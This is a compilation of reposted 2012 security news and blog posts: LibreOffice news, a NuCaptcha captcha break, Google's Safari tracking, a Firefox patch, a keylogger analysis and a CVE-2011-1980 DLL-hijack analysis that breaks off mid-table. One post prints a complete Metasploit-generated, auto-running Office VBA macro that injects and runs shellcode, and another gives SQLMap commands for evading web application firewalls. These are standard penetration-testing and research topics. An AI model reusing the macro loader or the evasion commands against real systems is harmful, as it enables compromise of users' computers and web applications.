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[h=1]Intel Joins LibreOffice[/h] Thu, 2012-02-23 09:52 by Swapnil Bhartiya The month of February is a month to remember for the LibreOffuce project. They formally incorporated the foundation in Berlin, released 3.5 with major changes and now Intel is joining the foundation as a member. Intel will also make available the LibreOffice for Windows from SUSE in Intel AppUp center. Intel AppUp Center is an online repository designed for Intel processor-based devices. "I have been using LibreOffice from day one for presentations at conferences and for data analysis," said Dawn Foster, open source community lead, Intel. "Our engineers have worked with the LibreOffice codebase to optimise it for Intel hardware. Adding it to the AppUp? Center is an obvious extension, and will provide an exciting feature for all Ultrabook users." "We are thrilled to add Intel to our existing roster of supporters", said Florian Effenberger, volunteer and TDF board member, "TDF is first and foremost a vendor neutral project committed to excellence in the office suite space, but we greatly value the support and advice we gain from organisations such as SUSE, Red Hat, Google, the Free Software Foundation (FSF) and Software in the Public Interest (SPI)." LibreOffice has put open source office suite in direct competition with Microsoft's own offering. OpenOffice suffered stagnation and did not see any innovation or improvement for a long time. Sursa: Intel Joins LibreOffice | Muktware
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Update: A look at ASLR in Android Ice Cream Sandwich 4.0 How we broke the NuCaptcha video scheme and what we propose to fix it Mozilla Releases Firefox 10.0.2 for png Flaw Keylogger poses as Facebook and Microsoft, steals login credentials Direct Shellcode Execution via MS Office Macros with Metasploit Hunting & Exploiting Directory Traversal Ubuntu 12.04 LTS Gets HUD Interface Trend Micro Releases HijackThis Source Code to sourceforge.net Google Chrome update fixes high-severity vulnerabilities and patches Flash Player Hacking / Exploiting / Cheating in Online Games Many roads to IAT Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) Exploiting CVE-2011-2140 another flash player vulnerability [unix/Solaris] Structura fizica/logica disk-uri (system level) RudraScript .. Run code in every language from inside Lua scripts. Cand am timp ma mai ocup si mai postez, doar ca nu prea am mai avut timp. Pagina: https://www.facebook.com/rstforum https://www.facebook.com/rstforum
[h=1]How we broke the NuCaptcha video scheme and what we propose to fix it[/h] Feb, 17 2012 | Security | Elie | No comments NuCaptcha is the first widely deployed video captcha scheme. Since Technology Review interviewed me about NuCaptcha in October 2010, I have been working on evaluating its security and usability. In this blog post, I will discuss how we are able to break the current version of NuCaptcha with >90% success and also discuss a possible approach to fix them. Our fix is based on a new design principle called tracking resistance . Intuitively tracking resistance means you had object that have the same properties than the real captcha so the algorithm don’t know which object in the video he should track. When successfully implemented, tracking resistance makes video captcha secure against vision/machine learning attacks and more secure than standard text-based captchas. I have been working on NuCaptcha security with many people over the last year and half, including Matthieu Martin, Shang Ping, Jonathan Aigrain, Mike Bailey and John Mitchell. [h=2]Responsible disclosure[/h] Before getting started, it is important to mention that this post is a responsible disclosure: I have been in contact with the CEO of NuCaptcha for a couple of months now and have shared with him the result of our research way ahead of time, so they had plenty of time to get ready for this post (you can read their answer here) I also want to emphasize that the goal of this post is not to demo another cool attack (even though the algorithm is pretty nifty). Rather, I want to start an open discussion on the viability of our tracking resistance principle and to allow everyone to contribute to making video captchas a viable alternative to more traditional captcha schemes. [h=2]Feedback Welcome[/h] While discussing ongoing research (that is, before a research paper is accepted or submitted) is unorthodox in the security community, the numerous interactions I’ve had with various companies over the last 3 years made me realize many people rely on research results to design captchas. In this context, it is our duty to provide them the best and most secure design guidelines possible. I strongly believe in the example set by the cryptography community, that the best security is achieved through an open process and not with secrecy or isolation. Accordingly, this post summarizes our understanding of video captcha security and the reasoning that leads us to believe that tracking resistance is the best principle to make video captcha secure. The most difficult part of this research turned out not to be breaking NuCaptcha, which I’ve known how to do since December 2010, but rather to come up with the right abstraction to explain why video captchas might offer better security that image captchas and to synthesize where the extra security comes from. With this in mind let’s get started on how to break NuCaptchas before discussing how to make them secure. [h=2]The NuCaptcha Scheme[/h] There are currently two different versions of NuCaptcha: a ‘simple’ version and the ‘standard’ version. The simple version looks like this: The standard version looks like this: As visible in the screenshot, the standard version differs from the simple version by a text animation from right to left. The user is then asked to enter the last word in the input box in the standard version. This scheme has multiple levels of security: In its easiest version the letters of the last word are in red, in the hard version the letters are in black and more heavily distorted. According to the site documentation, NuCaptcha uses a reputation algorithm to decide which version you get. Under the hood the NuCaptchas are short video files that contains about 500 frames. [h=2]Which version to evaluate?[/h] Since our technique successfully breaks the simple and the standard version of NuCaptcha, I am going to stick with the standard version because I believe that motion is the key feature to create a secure video captcha. To keep things fair, we are also going to focus on breaking the hard version and not rely on any of the advantages provided by having the letter in red or having them less distorted. [h=2]Background customization[/h] NuCaptcha allows users to choose between various background to customize their captchas. However, as we showed at CCS last year (available here) in our paper on breaking and securing text captchas, removing the background is fairly easy with the right algorithm so we are going to stick with the default one. Regardless of the background chosen, but our attack still applies. [h=2]Attack algorithm overview[/h] Overall, breaking a NuCaptcha captcha is done by accomplishing the 5 phases depicted in the diagram below. The attack algorithm assumes NuCaptchas that have been converted into frames. This step can be trivially executed using off-the-shelf software, so we will not discuss it here. The pre-processing phase involves removing the background and binarizing the captcha in black and white so it is easier to process. The frame analysis phase is then used to find the object in each frame can potentially be the captcha. The cross-frame analysis phase combines the frame analysis results to isolate the set of frames where the actual captcha is present. The segmentation phase aims at separating the captcha letters. As we will see there are a couple of ways to do this–having multiples distortions of the same captcha actually gives us an opportunity to be more efficient at segmentation than with a standard captcha. Finally, the recognition phase is used to recognize each letter individually using a machine learning algorithm. [h=4]How does it compare to standard text-based captchas[/h] Compared to breaking image-based captchas, attacking video captchas is both harder and easier. It is harder because motion tracking is necessary to isolate the frames that contains the actual captcha. It is easier because being able to analyze multiple copies of the same captcha can boost the accuracy of the segmentation phase. Since the pre-processing part and the recognition part are very well understood and use well-known techniques, I am going to skip them to keep this blog post shorter. If you are interested in the subject or need a refresher, please read my paper on attacking image-based captchas (available here). [h=2]Finding the captcha[/h] Before we can attempt to segment the captcha, we first need to find the frames in which it appears. We assume that each NuCaptcha has a different starting point in the animation, as we want our attack to be robust and not to rely on easily fixable features. Our first task is thus to isolate the frames that contain the captcha itself, and within these frames isolate the captcha from other words that appear. To achieve this we track and analyze the words moving in the captcha using image and motion tracking. Our captcha isolation technique works backward and is done in two steps: First we isolate the most interesting object in each frame (see next section), then we track theses objects across multiple frames and keep the set of 50 frames that contain the overall most interesting object. [h=2]Frame analysis: finding the most interesting object[/h] We relying two type of image analysis to isolate the most interesting object in each frame: a bounding box shape analysis, and an interest points (SIFT algorithm) density evaluation. An example of a frame where the object bounding boxes (the yellow squares), and object interests points (purple crosses) are computed is visible on the screenshot below: Based on these features, we found two ways to select the most interesting object: First, we look at the bounding box shape ratio width/height. Because the captcha is 4 letters long, we use a heuristic that the bounding box must have a width/height ratio of greater than 1. We then discard every bounding box that is above or below certain thresholds, as we roughly know what the expected ratio is after looking at a couple of captchas. Second, we look at the SIFT (Scale-invariant feature transform) interest points density by bounding box. As visible on the screenshot above, the captcha bounding box contains more interesting points that the other boxes. This is explained by the fact that the captcha letters are rotated independently and therefore have more ‘edges/corners’ than straight letters. The fact that the letters are rotated also implies that for the real captcha the interests points are scattered all over the box. On the other boxes the interest points are mostly nears the edges because the letters are straight. We aggregate theses two observations (more points, more scattering) into a density metric D that will be used to select the most interesting object. The metric D is computed as follows: D = Sum(1/distance(p_1, box_center)) where distance is the Euclidean distance and p_1 is each interest point. Basically, D calculates a weighted-sum of all the interest points by giving more weight to the interest points closer to the center of the box. Combining these two techniques allow us to isolate the most ‘interesting’ object in each frame, by removing the objects below or above the bounding box thresholds and picking up the object for which D is the highest. The result of this selection algorithm for our example fame is visible on the screenshot below (Den being the value of the metric D for the given box): [h=2]Cross-frames analysis: finding the captcha[/h] Being able to isolate interesting objects is not good enough because in some frames the captcha will not be present. To isolate the set of frames where the most interesting object is the real captcha, we use the features extracted during the frame analysis step to do a “cross-frame analysis.” Our cross-frame algorithm works by computing a sliding window over the density metric D on 50 frames. As visible on the screenshots below, where the D value of the window is represented in the red curve, there is a clear spike when the captcha is displayed. So all we have to do is keep the highest spike (which encompass 50 frames) and discard the remaining frames. [h=3]Segmenting the captcha[/h] The previous step identified 50 frame containing the captcha, giving us 50 instances of the same captchas that are slightly different (each letter is being animated independently). Here is an example: We can exploit these multiple variations of the same captcha in three different ways to help segment the captcha into individual letters. First we can try to find an instance where all the letters are disjoint, making the segmentation trivial with a clustering algorithm. While we did found some instances where this is the case, this is not a good approach as it is unreliable and can be patched very easily. The second approach is to try Decaptcha (our captcha tool) on every instance, and uses a voting decision to select the most probable answer. Using this approach, Decaptcha gives a 83% success rate on NuCaptchas. Here is an example of some of the clusters we have on a given NuCaptcha. It can be seen that than some of them are better segmented than others and therefore easier to recognize. It is likely possible to improve the effectiveness of this approach by factoring the confidence of the classifier in the voting procedure, but since the results with simple voting were already good enough to prove NuCaptcha vulnerable, we ended up not pursing this direction. A third approach to get close to 100% success rate is to use motion tracking (optical flow) to segment the letters. This approach uses a two-step algorithm. First, we compute the interest points in each frame and then track them across frames. You can see an example of this step on the screenshot below: Second, we compute a distance matrix (using a RANSAC algorithm) to analyze which interest points move together, defined as their relative distance staying almost constant. Each group of points that moves together makes up a cluster that represents a letter. We can use these points to know where each letter starts and ends and to perform segmentation, which we show in the screenshots below. Since matching corresponding interest points between frames is never perfect, sometime we have very good results and sometime bad ones. However, since we track letter movements between pair of frames (the frame and the frame + 5) we have a lot of candidates to choose from, and we only need one good match to be successful. This discrepancy between the quality of the matches is illustrated on the screenshot below: The left side depict an example where the tracking has generated 6 clusters that are not very accurate. The example on the right shows a successful clustering based on the distance matrix data. Even though the E, A, and, P are collapsed we are able to almost perfectly separate them using the distance matrix. [h=4]Synthesizing the problem[/h] To summarize, animating the captcha allows the attacker to do a “differential” analysis that helps the attack be more efficient. On the other hand, not animating the captcha is equivalent to having a static (text-based) captcha renders moot any security advantage of using a video captcha. [h=2]Toward secure video captcha[/h] So are video captchas worthless? No, but it requires a lot of out of the box thinking for us to find a way out. It took us significantly longer to understand the root of the problem and how to solve it than to break the current NuCaptcha scheme. Once we have accepted the fact that the segmentation resistance for video captchas will be equivalent or lower than a standard text-based captcha(as explained above), it becomes clear that the extra-security provided by using a video captcha needs to come from somewhere else–We have to find a hard vision problem to rely upon. Trying to prevent the computer from finding moving objects using a ‘confusing/moving background’ is a lost cause. The computer vision field has devised very efficient algorithms (optical flow algorithm) that are likely to destroy any attempts in this direction. On the other hand, it seems possible to make the isolation of the correct moving object very difficult. What we need to do is to remove every discriminative feature (or invariants as Jeff Yan calls them) that the attacker can use to tell apart decoy moving objects and the real captchas. For example our attack relies on two discriminative features to isolate the captchas: the number of interest points and the shape of the bounding box. Both of these features can be nullified by adding (moving) decoys that exhibit the same properties. [h=2]NuCaptcha Response[/h] As I said in the introduction, we notified NuCaptcha on November 21st, 2011 informing them we had an attack against their current scheme and iterated with them until December 15th 2011. On February 7th we wrote this blog post and shared it with them. At this time, they provided us an official answer that you can read here. Their answer contains two mains points regarding the attack. First on page one, they state, that they have a harder version that add more distortions and where the letters are more crowded. When scraping their API, we emulate the behavior of a real bot by aggressively timing our requests. While we believe we got the version that a standard attacker might get (which is already harder than the version displayed on site), we have not evaluated the hard version referenced in their response. With respect to the difficulty of their hard CAPCHA, I don’t believe that these heavier distortions are an efficient defense because even if the letters are more crowded, it should not impact an optical flow algorithm used to separate the letters. Further, I belive the heavier distortions should not be an issue for the recognition phase as it is well known since 2005 that computers beat human when it comes down to recognizing a single heavily distorted character. The solution proposed by NuCaptcha. Image taken from their response. Regarding their fix, they propose adding inter-frame manipulation (see screenshot above ) which should mess-up our optical flow analysis by throwing of our distance matrix. I won’t be able to characterize the effectiveness of this technique until they roll out their changes and I can test it. My guess is that it is somewhat less effective, based on the fact than in cryptography adding noise to prevent side-channel attacks has been known to be ineffective (The canonical example being the differential power analysis attack (DPA) by Paul Kocher), but again will withhold judgement until we can test. [h=2]Toward secure video captcha[/h] It is likely that there are features other than the two we used that can be abused by an attacker to break tracking resistance. This is why, following the good practices pioneered by the cryptography community, we decided to ask for your help to find them This post openly discusses what we already know about video captcha security. We hope this is the first step in an evaluation process dedicated to make the video captcha tracking resistance a viable option. I will also discuss this attack in my upcoming RSA talk about captchas in February, so if you are around, I would be happy to discuss it. Sursa: How we broke the NuCaptcha video scheme and what we propose to fix it @ From Information to Intelligence
[h=1]SQLMap Tamper Scripts[/h] Web Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilities and merely rely on the firewall for protection. Regrettably, most, if not all firewalls can be bypassed. In saying this, my post will demonstrate how to use some of SQLMap’s new features to bypass WAFs/IDSs. I have recently had the pleasure of working on a few tamper scripts for SQLMap, which can be found in the latest development version from the subversion repository. svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ The first scripts I’ll demonstrate are space2hash.py and space2morehash.py which work with MySQL (still haven’t gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parenthesis. To get started using the tamper scripts, you use the –tamper switch followed by the script name. In my example I’m using the following command: ./sqlmap.py -u -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py” Figure 1: space2morehash.py tamper script in action via websec.ca Read this whole blog, tamper scripts win. Sursa: SQLMap Tamper Scripts Security Aegis
[h=1]Google under fire over secretly tracking users By John Blackstone [/h] (CBS News) Some members of Congress are calling for an investigation of Google, after word came out the company has been tracking iPhone users all over the Internet -- even users who thought they blocked that kind of surveillance CBS News correspondent John Blackstone spoke with the man who uncovered what Google was doing. Stanford University grad student Jonathan Meyer was doing research on Internet privacy, when he discovered the computer code that let Google bypass user privacy settings. "The list just goes on and on," said Meyer. "If you went to these sites and thought you were there privately, you weren't?" asked Blackstone. "That's right," he said. Google tracked iPhone users by cheating Safari Most iPhone and iPad users access the Internet through Apple's Safari browser, which automatically sets up a barrier to keep out tracking programs from third-party advertisers. Google found a way to secretly get through that barrier, letting the advertisers flow in and tracking information flow out. "The technology we were looking at involves taking what Google learned through organizing your information, and using that to enrich their advertising content on non-Google websites," said Meyer. Blackstone posed a question: "Google's slogan: 'Do no evil.' Is this evil? "I think it raises question about evil," said Meyer. "I hesitate to give a bright line response on the evil or not. I think if evil includes negligence and gross negligence, then this is evil." In a statement, Google insists the tracking codes it planted "do not collect personal information." And that it "didn't anticipate this would happen" when it made changes to improve access to Google features on Safari. Tracking user on-line habits is the most valuable information Internet companies and advertisers can get. John Simpson, a consumer advocate, said user preferences and information are what Google is selling. "Don't think of yourself as Google's customer, you are Google's product," he said. Blackstone asked Meyer when he goes online, does he turn the privacy settings up full? "For sure," Meyer replied. "I think it's pretty absurd. You shouldn't need a Ph.D. in computer science to protect yourself." Meyer said his research at Stanford University shows that what we used to call spyware is now become standard business practice on the Internet. Also, Google said it has removed the code that created that privacy loophole. Sursa: Google under fire over secretly tracking users - CBS News
[h=1]Mozilla Releases Firefox 10.0.2 for png Flaw[/h]By Sean Michael Kerner | February 17, 2012 From the 'Be Careful What you Click' files: At the end of last week, Mozilla released Firefox 10.0.1, which fixed a single flaw. Now here we are at the end of a new week, and there is another release with Firefox 10.0.2. This time the flaw is one that I'm familiar with - as it was patched by Google in Chrome 17, just slightly ahead of the Firefox 10.0.2 update. The actual flaw is a vulnerability in the libpng graphics library that many open source tools (including browsers) use. It's an integer overflow flaw that could have some serious consequences. "An attacker could craft malicious images which exploit this bug, and deliver them to users through websites or email messages," Mozilla warned in its advisory. According to Mozilla, they were alerted about the flaw by Red Hat. In any event, make sure you update, this is a flaw looks relatively easy to me to exploit and thanks to the quick actions of Google and Mozilla - now trivially easy to protect against too. Sursa: Mozilla Releases Firefox 10.0.2 for png Flaw - InternetNews.
[h=2]Keylogger poses as Facebook and Microsoft, steals login credentials[/h]y Dave Michmerhuizen & Luis Chapetti – Security Researchers Most computer users have a haunting fear that somehow malware will find a way to sneak onto their PCs when they are not looking. The truth is that while this does sometimes happen, the most common types of malware rely on trickery to invade and infect your computer. An excellent example of this fell into our spam traps recently, a spam that pretended to be from Facebook (an easy thing to fake, actually) hiding its payload behind an official looking graphic from Microsoft. In this case the image is an HTML link supposedly offering up Microsoft Silverlight. If you take your time and examine the destination of that link you’ll see that the real payload is a .PIF file from an IP address in Malaysia. PIF files are Windows executable files, and in this case the executable that is actually sent is Trojan.Win32.Jorik. It can’t sneak onto your computer and install itself though; it needs your help to do that. Clicking on the Silverlight graphic does warn you that you’re about to run a program. This is why the Microsoft graphic is a clever addition to the ruse – you think you should be running a Microsoft program, and it’s doing exactly what you expect. The problem, of course, comes once you’ve pressed ‘Run’ and find out there is no Facebook or Silverlight, there is only malware. Trojan.Win32.Jorik is actually a keylogger. It begins monitoring your Web browsing, writing every keystroke and Web page title into a disk file. The keylogger can capture almost anything you do on the Web. This is of particular concern when visiting secure sites whose credentials you definitely want kept private, as demonstrated below: [TABLE=align: center] [TR] [TD] Wells Fargo HTTPS login page (click for larger image) [/TD] [/TR] [TR] [TD] Facebook login page (click for larger image) [/TD] [/TR] [TR] [TD] Gmail HTTPS login page (click for larger image) [/TD] [/TR] [/TABLE] We entered FakeUsername and FakePassword on all three sites. The results were easily found in the disk file that the keylogger maintains. Keylogger file contents (click for larger image) Ultimately this disk file is sent back to a command and control server, hidden by no-ip.com and most likely also in Malaysia. Network traffic to Command & Control (click for larger image) The bottom line, as we always say at Barracuda Labs, is to maintain a healthy skepticism about anything that appears in email. The easiest way into your computer is to persuade you to push that ‘run’ button. Spammers and malware distributors are constantly looking for ways to convince you to do just that. Be vigilant, don’t be a victim. Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat. Sursa: Keylogger poses as Facebook and Microsoft, steals login credentials | The Barracuda Labs Internet Security Blog
[h=1]The Differences Between Security Certifications[/h]Friday, February 17, 2012 Contributed By: Joshua Lochner I was involved recently in a conversation regarding, “What are worthwhile security-related certifications?” It seems like certifications have always been a source of contention for IT professionals. What are “The Right” certifications to get? Are they needed? Which ones would someone reap the most benefit from? Who cares? The right certifications to pursue are going to vary from person to person, as to what would suit your interests and meet your goals best. Ask yourself some basic questions: What interests me? For example… Are you a network administrator who wants to build up their credibility when proposing solutions to clients?... Or are you a database administrator or UNIX or Windows system administrator who wants to expand their knowledge in their existing job role? Do I want to remain in the same field or pursue a new path? What are your strong suits, and do you intend to build on those, or branch out in a new direction? Did you just change departments and want to establish a better understanding of the field you have moved into; if so, what certifications do your colleagues or would those above you respect? What would lead to career growth? Would there be a certification that would provide benefit to your organization? Have you asked around to determine if any certifications are needed to fill roles in the organization; and if you get the certifications, would that role be something you might be interested in? Sometimes a simple certification can help to meet a business objective, or grow an internal process; and by helping the organization meet its objectives, the position filled may be higher up on the ladder than where you currently are. Let’s run through a couple of questions on the Certs Diagram, and you’ll be on your way to figuring out whether a CCIE Security, a CIAC GCIH, or a GIAC GPEN would be the best cert for you to pursue next. (click image to enlarge) Bear in mind, the Certs Diagram is non-exhaustive; it is more to illustrate the point that there are lots of avenues to go down when approaching security certifications. That is why my company employs experts in five different practices to make a cohesive team. The benefits of pursuing information security certifications that align with one’s personal goals are reflected here. Cross-posted from SecureState Sursa: The Differences Between Security Certifications
[h=1]Symantec: Stripping online certificate revocation checks from Chrome is misguided[/h][h=2]Symantec says that Google and other browser vendors should help fix OCSP instead of giving up on it[/h] By Lucian Constantin | IDG News Service Stripping OCSP (Online Certificate Status Protocol) and CRL (certificate revocation list) checks from Google Chrome could have dangerous implications because it will turn Google into a single point of failure, according to security vendor Symantec. When accessing a website over HTTPS (HTTP Secure), browsers check whether its SSL certificate has been revoked by the issuing certificate authority (CA). This is done by querying the CA's OCSP responder or by checking its published certificate revocation list. [ Prevent corporate data leaks with Roger Grimes' "Data Loss Prevention Deep Dive" PDF expert guide, only from InfoWorld. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter. ] For usability reasons, all major browsers currently ignore OCSP and CRL requests that result in network errors by default, in what is known as a soft-fail mechanism. However, some of them do offer users the option to enable hard-fail, which triggers errors for every request that goes unanswered. On Feb. 5, Adam Langley, a security engineer at Google, announced that Chrome will stop performing OCSP and CRL checks in future versions. Instead, these checks are to be replaced with a locally cached list of revoked certificates that will be kept up to date by Google. The reasons behind the decision are related to performance and security issues. OCSP and CRL requests increase page load times and are susceptible to blocking by man-in-the-middle attackers or captive portals, websites commonly used by Wi-Fi access points to prevent HTTP connections before users authenticate. "This is a corner case that happens very infrequently. We argue that one shouldn't discard OCSP and CRLs because they don't work in a tiny fraction of cases," said Fran Rosch, vice president of Trust Services and SSL at Symantec, in a blog post on Thursday. "His [Langley's] proposal to have the browser maintain a list of revoked certificates turns Google into a single point of failure, which Langley himself agrees is bad engineering practice," Rosch said. According to Rosch, the soft-fail mechanism currently used by browsers is the real issue, since it allows HTTPS sessions to continue without establishing whether the SSL certificate is valid or not. Symantec has maintained an uptime of 100 percent for its OCSP and CRL services for the past ten years, so CA-level downtime shouldn't be a concern, he said. "OCSP clearly does not work today because all major browsers operate it in soft-fail mode. That needs fixing," said Ivan Ristic, director of engineering at security firm Qualys, via email. "My view is that Google should have first made an effort to fix the problem," he said. Qualys plans to start a project called "Global OCSP Responder monitoring" which will track the availability of all OCSP responders and identify CAs with unreliable ones. "That would hopefully enable everyone to switch to hard-fail by default," Ristic said. According to Ristic, the performance issues could be resolved with the help of a technique known as OCSP stapling, which involves the owner of a SSL certificate querying the CA's OCSP server periodically and caching a signed response. This response would then be served to clients directly without them needing to open a connection to a separate host. "Even without OCSP stapling, browsers can start to display a web site and perform the check in the background, so there's not going to be an immediate performance impact," Ristic said. "They could hard-fail after a second or two, possibly preventing further interactions with the site." Removing OCSP checks from Google Chrome might even have legal implications for users, who won't be able to claim warranties for damages resulting from the use of bad certificates if the software they rely on doesn't make an effort to check certificate revocation status, said Eddy Nigg, founder and chief technology officer of certificate authority StartCom, via email. "Strictly speaking, Google as a relying party and software vendor might not be able to make use of the CA root certificates its browser currently uses, due to non-compliance to those relying party obligations," Nigg said. Nigg agreed that the problem is the soft-fail mechanism implemented in browsers, which he described as a failure in itself. "It's rather the browsers that have fairly weak implementations at their side and don't try hard enough (and smart enough) in order to obtain a status response," he said. Sursa: Symantec: Stripping online certificate revocation checks from Chrome is misguided | Security - InfoWorld
[h=3]Direct Shellcode Execution via MS Office Macros with Metasploit[/h][h=2]Friday, February 3, 2012[/h] scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around. msf > use payload/windows/exec msf payload(exec) > set CMD calc CMD => calc msf payload(exec) > set EXITFUNC thread EXITFUNC => thread msf payload(exec) > generate -t vba #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long #EndIf Sub Auto_Open() Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long #If Vba7 Then Dim Xlbufvetp As LongPtr #Else Dim Xlbufvetp As Long #EndIf Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _ 139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _ 13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _ 116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _ 214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _ 36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _ 139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _ 235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _ 224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _ 187,71,19,114,111,106,0,83,255,213,99,97,108,99,0) Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40) For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp) Wyzayxya = Hyeyhafxp(Zolde) Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1) Next Zolde Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application. Posted by CG at 5:21 PM Sursa: Carnal0wnage & Attack Research Blog: Direct Shellcode Execution via MS Office Macros with Metasploit
[h=3]Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog[/h][h=2]Wednesday, February 15, 2012[/h]On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happend with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability and Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog. [h=3][/h] [h=3][/h] [h=3]Common Vulnerabilities and Exposures (CVE)number[/h] [h=3] CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."[/h] [h=3]Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)[/h] Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada [h=3][/h] [h=3][/h] [h=3]General File Information[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020[/h] [h=3]Download[/h] Download as a password protected archive (email me if you need the password) [TABLE] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] [h=3]File Desription[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Before the document is open - DLL file is present is the same directory[/TD] [/TR] [/TABLE] The Word document has embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior, you can read more about this particular control here "Using the ListView ActiveX Control" and it is normal for it to call Frontpage libraries. The vulnerability presents itself in the in the fact that a DLL located in [TABLE=class: tr-caption-container] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]After the document is open. DLL file is renamed to Thumbs.db[/TD] [/TR] [/TABLE] the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Activity after the exploit launch[/TD] [/TR] [/TABLE] Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name) Office 8.0 is office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]List view control[/TD] [/TR] [/TABLE] Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Anwering Yes will allow the dropped payload iede32.ocx to run. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] 